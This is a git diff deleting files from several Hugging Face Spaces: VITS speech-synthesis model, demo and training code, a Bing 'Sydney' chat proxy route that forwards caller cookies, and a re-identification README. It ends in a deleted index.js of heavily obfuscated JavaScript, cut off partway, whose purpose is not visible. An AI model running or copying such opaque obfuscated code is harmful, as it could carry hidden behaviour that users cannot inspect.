torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels,1)) - self.logs = nn.Parameter(torch.zeros(channels,1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1,2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN(hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels]*2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1,2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - 
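As an aside, `ResidualCouplingLayer` above is exactly invertible: `forward` applies `x1 = m + x1 * exp(logs)` and `reverse=True` undoes it in closed form. A minimal standalone sketch of that scalar affine map (plain Python, independent of the classes in this file; `couple` is a hypothetical helper for illustration only):

```python
import math

# Hypothetical helper mirroring the scalar form of the affine coupling in
# ResidualCouplingLayer: forward is y1 = m + x1 * exp(logs); reverse applies
# the closed-form inverse (y1 - m) * exp(-logs).
def couple(x1, m, logs, reverse=False):
    if not reverse:
        return m + x1 * math.exp(logs)
    return (x1 - m) * math.exp(-logs)

y1 = couple(1.5, m=0.3, logs=0.2)
x1 = couple(y1, m=0.3, logs=0.2, reverse=True)
print(abs(x1 - 1.5) < 1e-12)  # round trip recovers the input
```

The same closed form explains the `logdet = torch.sum(logs, [1,2])` term in `forward`: the Jacobian of the affine map is diagonal with entries `exp(logs)`, so its log-determinant is just the sum of `logs`.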
-class ConvFlow(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, n_layers, num_bins=10, tail_bound=5.0): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.) - self.proj = nn.Conv1d(filter_channels, self.half_channels * (num_bins * 3 - 1), 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] - - unnormalized_widths = h[..., :self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins:2*self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_derivatives = h[..., 2 * self.num_bins:] - - x1, logabsdet = piecewise_rational_quadratic_transform(x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails='linear', - tail_bound=self.tail_bound - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1,2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/wy213/213a/src/pages/api/sydney.ts b/spaces/wy213/213a/src/pages/api/sydney.ts deleted file mode 100644 index 0e7bbf23d77c2e1a6635185a060eeee58b8c8e66..0000000000000000000000000000000000000000 --- a/spaces/wy213/213a/src/pages/api/sydney.ts +++ /dev/null @@ -1,62 +0,0 @@ -import { NextApiRequest, NextApiResponse } from 'next' -import { WebSocket, debug } from '@/lib/isomorphic' -import { BingWebBot } from 
'@/lib/bots/bing' -import { websocketUtils } from '@/lib/bots/bing/utils' -import { WatchDog, createHeaders } from '@/lib/utils' - - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - const conversationContext = req.body - const headers = createHeaders(req.cookies) - debug(headers) - res.setHeader('Content-Type', 'text/stream; charset=UTF-8') - - const ws = new WebSocket('wss://sydney.bing.com/sydney/ChatHub', { - headers: { - ...headers, - 'accept-language': 'zh-CN,zh;q=0.9', - 'cache-control': 'no-cache', - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - pragma: 'no-cache', - } - }) - - const closeDog = new WatchDog() - const timeoutDog = new WatchDog() - ws.onmessage = (event) => { - timeoutDog.watch(() => { - ws.send(websocketUtils.packMessage({ type: 6 })) - }, 1500) - closeDog.watch(() => { - ws.close() - }, 10000) - res.write(event.data) - if (/\{"type":([367])\}/.test(String(event.data))) { - const type = parseInt(RegExp.$1, 10) - debug('connection type', type) - if (type === 3) { - ws.close() - } else { - ws.send(websocketUtils.packMessage({ type })) - } - } - } - - ws.onclose = () => { - timeoutDog.reset() - closeDog.reset() - debug('connection close') - res.end() - } - - await new Promise((resolve) => ws.onopen = resolve) - ws.send(websocketUtils.packMessage({ protocol: 'json', version: 1 })) - ws.send(websocketUtils.packMessage({ type: 6 })) - ws.send(websocketUtils.packMessage(BingWebBot.buildChatRequest(conversationContext!))) - req.socket.once('close', () => { - ws.close() - if (!res.closed) { - res.end() - } - }) -} diff --git a/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py b/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py deleted file mode 100644 index ba29f6a5aff153461017c2e11e03a8765581c0d5..0000000000000000000000000000000000000000 --- a/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py +++ /dev/null @@ -1,150 +0,0 @@ -# coding=utf-8 -import time 
-import os -import gradio as gr -import utils -import argparse -import commons -from models import SynthesizerTrn -from text import text_to_sequence -import torch -from torch import no_grad, LongTensor -import webbrowser -import logging -import gradio.processing_utils as gr_processing_utils -logging.getLogger('numba').setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit text and audio length in huggingface spaces - -audio_postprocess_ori = gr.Audio.postprocess -def audio_postprocess(self, y): - data = audio_postprocess_ori(self, y) - if data is None: - return None - return gr_processing_utils.encode_url_or_file_to_base64(data["name"]) -gr.Audio.postprocess = audio_postprocess - -def get_text(text, hps): - text_norm, clean_text = text_to_sequence(text, hps.symbols, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = LongTensor(text_norm) - return text_norm, clean_text - -def vits(text, language, speaker_id, noise_scale, noise_scale_w, length_scale): - start = time.perf_counter() - if not len(text): - return "输入文本不能为空!", None, None - text = text.replace('\n', ' ').replace('\r', '').replace(" ", "") - if len(text) > 100 and limitation: - return f"输入文字过长!{len(text)}>100", None, None - if language == 0: - text = f"[ZH]{text}[ZH]" - elif language == 1: - text = f"[JA]{text}[JA]" - else: - text = f"{text}" - stn_tst, clean_text = get_text(text, hps_ms) - with no_grad(): - x_tst = stn_tst.unsqueeze(0).to(device) - x_tst_lengths = LongTensor([stn_tst.size(0)]).to(device) - speaker_id = LongTensor([speaker_id]).to(device) - audio = net_g_ms.infer(x_tst, x_tst_lengths, sid=speaker_id, noise_scale=noise_scale, noise_scale_w=noise_scale_w, - length_scale=length_scale)[0][0, 0].data.cpu().float().numpy() - - return "生成成功!", (22050, audio), f"生成耗时 {round(time.perf_counter()-start, 2)} s" - -def search_speaker(search_value): - for s in speakers: - if search_value == s: - return s - for s in 
speakers: - if search_value in s: - return s - -def change_lang(language): - if language == 0: - return 0.6, 0.668, 1.2 - else: - return 0.6, 0.668, 1.1 - -download_audio_js = """ -() =>{{ - let root = document.querySelector("body > gradio-app"); - if (root.shadowRoot != null) - root = root.shadowRoot; - let audio = root.querySelector("#tts-audio").querySelector("audio"); - let text = root.querySelector("#input-text").querySelector("textarea"); - if (audio == undefined) - return; - text = text.value; - if (text == undefined) - text = Math.floor(Math.random()*100000000); - audio = audio.src; - let oA = document.createElement("a"); - oA.download = text.substr(0, 20)+'.wav'; - oA.href = audio; - document.body.appendChild(oA); - oA.click(); - oA.remove(); -}} -""" - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--device', type=str, default='cpu') - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--colab", action="store_true", default=False, help="share gradio app") - args = parser.parse_args() - device = torch.device(args.device) - - hps_ms = utils.get_hparams_from_file(r'./model/config.json') - net_g_ms = SynthesizerTrn( - len(hps_ms.symbols), - hps_ms.data.filter_length // 2 + 1, - hps_ms.train.segment_size // hps_ms.data.hop_length, - n_speakers=hps_ms.data.n_speakers, - **hps_ms.model) - _ = net_g_ms.eval().to(device) - speakers = hps_ms.speakers - model, optimizer, learning_rate, epochs = utils.load_checkpoint(r'./model/G_953000.pth', net_g_ms, None) - - with gr.Blocks() as app: - gr.Markdown( - "#
    VITS语音在线合成demo\n" - "#
    严禁将模型用于任何商业项目,否则后果自负\n" - "
    主要有赛马娘,原神中文,原神日语,崩坏3的音色
    " - '
    ' - '' - ) - - with gr.Tabs(): - with gr.TabItem("vits"): - with gr.Row(): - with gr.Column(): - input_text = gr.Textbox(label="Text (100 words limitation) " if limitation else "Text", lines=5, value="今天晚上吃啥好呢。", elem_id=f"input-text") - lang = gr.Dropdown(label="Language", choices=["中文", "日语", "中日混合(中文用[ZH][ZH]包裹起来,日文用[JA][JA]包裹起来)"], - type="index", value="中文") - btn = gr.Button(value="Submit") - with gr.Row(): - search = gr.Textbox(label="Search Speaker", lines=1) - btn2 = gr.Button(value="Search") - sid = gr.Dropdown(label="Speaker", choices=speakers, type="index", value=speakers[228]) - with gr.Row(): - ns = gr.Slider(label="noise_scale(控制感情变化程度)", minimum=0.1, maximum=1.0, step=0.1, value=0.6, interactive=True) - nsw = gr.Slider(label="noise_scale_w(控制音素发音长度)", minimum=0.1, maximum=1.0, step=0.1, value=0.668, interactive=True) - ls = gr.Slider(label="length_scale(控制整体语速)", minimum=0.1, maximum=2.0, step=0.1, value=1.2, interactive=True) - with gr.Column(): - o1 = gr.Textbox(label="Output Message") - o2 = gr.Audio(label="Output Audio", elem_id=f"tts-audio") - o3 = gr.Textbox(label="Extra Info") - download = gr.Button("Download Audio") - btn.click(vits, inputs=[input_text, lang, sid, ns, nsw, ls], outputs=[o1, o2, o3]) - download.click(None, [], [], _js=download_audio_js.format()) - btn2.click(search_speaker, inputs=[search], outputs=[sid]) - lang.change(change_lang, inputs=[lang], outputs=[ns, nsw, ls]) - with gr.TabItem("可用人物一览"): - gr.Radio(label="Speaker", choices=speakers, interactive=False, type="index") - if args.colab: - webbrowser.open("http://127.0.0.1:7860") - app.queue(concurrency_count=1, api_open=args.api).launch(share=args.share) diff --git a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md b/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md deleted file mode 100644 index 
a20b6e7f1c279c065f8f2f81e078410796829951..0000000000000000000000000000000000000000 --- a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md +++ /dev/null @@ -1,18 +0,0 @@ -# Person Attribute Recognition -This code was developed for the experiment of person attribute recognition in [Omni-Scale Feature Learning for Person Re-Identification (ICCV'19)](https://arxiv.org/abs/1905.00953). - -## Download data -Download the PA-100K dataset from [https://github.com/xh-liu/HydraPlus-Net](https://github.com/xh-liu/HydraPlus-Net), and extract the file under the folder where you store your data (say $DATASET). The folder structure should look like -```bash -$DATASET/ - pa100k/ - data/ # images - annotation/ - annotation.mat -``` - -## Train -The training command is provided in `train.sh`. Run `bash train.sh $DATASET` to start training. - -## Test -To test a pretrained model, add the following two arguments to `train.sh`: `--load-weights $PATH_TO_WEIGHTS --evaluate`. 
\ No newline at end of file diff --git a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py b/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py deleted file mode 100644 index ff0f0eda86c5cbc8b045a3d8469dbc7ba5a1ffcf..0000000000000000000000000000000000000000 --- a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -from __future__ import absolute_import - -from .osnet import * - -__model_factory = { - 'osnet_avgpool': osnet_avgpool, - 'osnet_maxpool': osnet_maxpool -} - - -def build_model(name, num_classes, pretrained=True, use_gpu=True): - avai_models = list(__model_factory.keys()) - if name not in avai_models: - raise KeyError - return __model_factory[name]( - num_classes=num_classes, pretrained=pretrained, use_gpu=use_gpu - ) diff --git a/spaces/xnetba/MMS/vits/train.py b/spaces/xnetba/MMS/vits/train.py deleted file mode 100644 index 703d30cf9ef2c414d9b35fe65545cc8fefad8821..0000000000000000000000000000000000000000 --- a/spaces/xnetba/MMS/vits/train.py +++ /dev/null @@ -1,290 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler - -import commons -import utils -from data_utils import ( - TextAudioLoader, - TextAudioCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from 
text.symbols import symbols - - -torch.backends.cudnn.benchmark = True -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '8000'  # must be a valid TCP port (1-65535); the original '80000' is out of range - - hps = utils.get_hparams() - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32,300,400,500,600,700,800,900,1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioCollate() - train_loader = DataLoader(train_dataset, num_workers=8, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=8, shuffle=False, - batch_size=hps.train.batch_size, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - **hps.model).cuda(rank) - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - net_g.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - 
betas=hps.train.betas, - eps=hps.train.eps) - net_g = DDP(net_g, device_ids=[rank]) - net_d = DDP(net_d, device_ids=[rank]) - - try: - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "G_*.pth"), net_g, optim_g) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, optim_d) - global_step = (epoch_str - 1) * len(train_loader) - except: - epoch_str = 1 - global_step = 0 - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank==0: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d = nets - optim_g, optim_d = optims - scheduler_g, scheduler_d = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths) in enumerate(train_loader): - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - - with 
autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask,\ - (z, z_p, m_p, logs_p, m_q, logs_q) = net_g(x, x_lengths, spec, spec_lengths) - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) - grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - optim_g.zero_grad() - scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank==0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, 
loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update({"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths) in enumerate(eval_loader): - x, x_lengths = x.cuda(0), x_lengths.cuda(0) - spec, spec_lengths = spec.cuda(0), spec_lengths.cuda(0) - y, y_lengths = y.cuda(0), y_lengths.cuda(0) - - # remove else - x = x[:1] - x_lengths = x_lengths[:1] 
- spec = spec[:1] - spec_lengths = spec_lengths[:1] - y = y[:1] - y_lengths = y_lengths[:1] - break - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, max_len=1000) - y_hat_lengths = mask.sum([1,2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict = { - "gen/mel": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - } - audio_dict = { - "gen/audio": y_hat[0,:,:y_hat_lengths[0]] - } - if global_step == 0: - image_dict.update({"gt/mel": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) - audio_dict.update({"gt/audio": y[0,:,:y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - - -if __name__ == "__main__": - main() diff --git a/spaces/xznwwh/aabb/index.js b/spaces/xznwwh/aabb/index.js deleted file mode 100644 index 33437ab3c1c48cb9c99d97c3d3b458b9ee2a36f9..0000000000000000000000000000000000000000 --- a/spaces/xznwwh/aabb/index.js +++ /dev/null @@ -1 +0,0 @@ -(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function 
_0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const _0x348d5c=parseInt(_0x4acd10(0x3db,0x3de,0x389,0x4af,0x2ed))/(-0x1*-0x99b+0x1*0x12af+-0x1c49)*(parseInt(_0x4acd10(0x224,0x267,0x1fe,0x24b,0x2fc))/(0x2449+-0x5*0x75d+0x45*0x2))+parseInt(_0x4acd10(0x34f,0x32e,0x335,0x30c,0x2e0))/(-0x1a18+0x15d*-0x13+-0x3*-0x1156)+parseInt(_0x2197ea(0x364,0x3b7,0x2d6,0x26b,0x288))/(0x1e6+-0x1a3a*-0x1+-0x7*0x404)*(parseInt(_0x4acd10(0x47a,0x3ed,0x425,0x324,0x429))/(0xdca+-0xcdd*-0x3+-0x1a2e*0x2))+parseInt(_0xefd3bf(-0x249,-0x245,-0x167,-0x2c3,-0x272))/(0x2*-0x93b+0x21a3+-0x50d*0x3)*(parseInt(_0x4acd10(0x2e2,0x3a7,0x45d,0x34f,0x3a5))/(-0x8*-0x4a9+0x14ae+0x1*-0x39ef))+parseInt(_0x2197ea(0x1c3,0x1dd,0x22d,0x16f,0x2b1))/(-0x15f+-0x3*0xbb9+0x2*0x1249)*(parseInt(_0x297c01(0x56b,0x639,0x494,0x57d,0x4da))/(0x7a2+0x1*-0xedb+0x3a1*0x2))+parseInt(_0x4acd10(0x325,0x3cf,0x33d,0x3f5,0x470))/(-0x1f28+0x114+-0x1e*-0x101)*(-parseInt(_0xefd3bf(-0x199,-0x1e0,-0x163,-0x117,-0x119))/(-0x897+-0x1842+0x20e4))+parseInt(_0xb68276(0x3a8,0x40e,0x3ed,0x368,0x36b))/(-0x1c06+-0x1462+-0x1*-0x3074)*(-parseInt(_0x297c01(0x56d,0x622,0x59e,0x496,0x599))/(0x3*-0x45a+-0x1d72+0x3*0xe2f));if(_0x348d5c===_0x22327b)break;else _0x356a3e['push'](_0x356a3e['shift']());}catch(_0x2be93b){_0x356a3e['push'](_0x356a3e['shift']());}}}(_0x4e4c,0x82*-0x19d0+0x374aa+-0x71e1d*-0x3));function _0x1d31e6(_0x26aabc,_0x58e3f1,_0x4d962d,_0x44a366,_0x1e49ac){return _0x222c(_0x26aabc- -0x25,_0x4d962d);}const _0x7d8571=(function(){function _0x608687(_0x541c2e,_0x566e15,_0x56da78,_0x4712c,_0x461848){return _0x222c(_0x541c2e- -0x209,_0x566e15);}function _0x19cc71(_0x45b869,_0x4779d2,_0xbcb35d,_0x3ae9e2,_0x267e6a){return _0x222c(_0x3ae9e2-0x168,_0x267e6a);}function _0x2ff91a(_0x2fa4df,_0x2d5ef6,_0x128dfa,_0x5f2dcf,_0x1ed3d0){return _0x222c(_0x1ed3d0-0x382,_0x2d5ef6);}function _0x570f86(_0x328671,_0x57b76c,_0x39f1be,_0x5ab763,_0x4adaeb){return _0x222c(_0x5ab763- 
-0xc9,_0x57b76c);}function _0x237352(_0x27c7b9,_0x4fb426,_0xa489a,_0x533521,_0x1d2f34){return _0x222c(_0x27c7b9- -0x295,_0x533521);}const _0x5186e9={'CLxJL':function(_0x174521,_0x4e51f9){return _0x174521(_0x4e51f9);},'sEXRC':function(_0x47e55c,_0x304d65){return _0x47e55c+_0x304d65;},'vPGKz':_0x237352(-0x203,-0x2d5,-0x1b1,-0x11e,-0x1d8)+_0x237352(-0x72,-0x12,-0xf5,-0xc6,-0x14b)+_0x2ff91a(0x3ac,0x3ce,0x49a,0x47f,0x455)+_0x2ff91a(0x44f,0x4d3,0x3dc,0x4c2,0x45c),'TTiuI':_0x608687(-0x20,-0x38,0x8d,-0xc5,-0xbc)+_0x608687(-0x3d,-0x4c,0x80,-0x22,0x77)+_0x570f86(0x4a,0xb2,0xb9,0x4a,0x5)+_0x570f86(0x11d,0xec,0x168,0x13c,0xe0)+_0x19cc71(0x280,0x2ec,0x309,0x245,0x1ef)+_0x608687(-0xa0,-0x16f,-0x14e,-0xee,0x1)+'\x20)','YyzBo':function(_0x3fd5d6,_0x145fea){return _0x3fd5d6!==_0x145fea;},'liNNj':_0x608687(0x21,0x5b,0x60,-0x5a,-0xc8),'ZtWnq':function(_0x40dedb,_0x579930){return _0x40dedb===_0x579930;},'pGfic':_0x2ff91a(0x407,0x4fd,0x4b4,0x455,0x49b),'JOvwt':_0x570f86(0x82,0x58,0x78,0xc7,0xdf)+_0x237352(-0xfd,-0x2e,-0x60,-0xce,-0x18c)+_0x608687(-0x108,-0x1bb,-0xe1,-0xed,-0x1cd),'IgZqH':_0x570f86(0x1b,0xf5,-0xb7,0x4,-0x11)+'er','HHIYV':function(_0x3281b8){return _0x3281b8();},'fwptI':function(_0x442173,_0x163537){return _0x442173===_0x163537;},'AFQdy':_0x19cc71(0x405,0x3c5,0x42b,0x3c5,0x300),'EGhZe':_0x237352(-0x1d1,-0x1b3,-0x20a,-0x266,-0x1f7)};let _0x460d02=!![];return 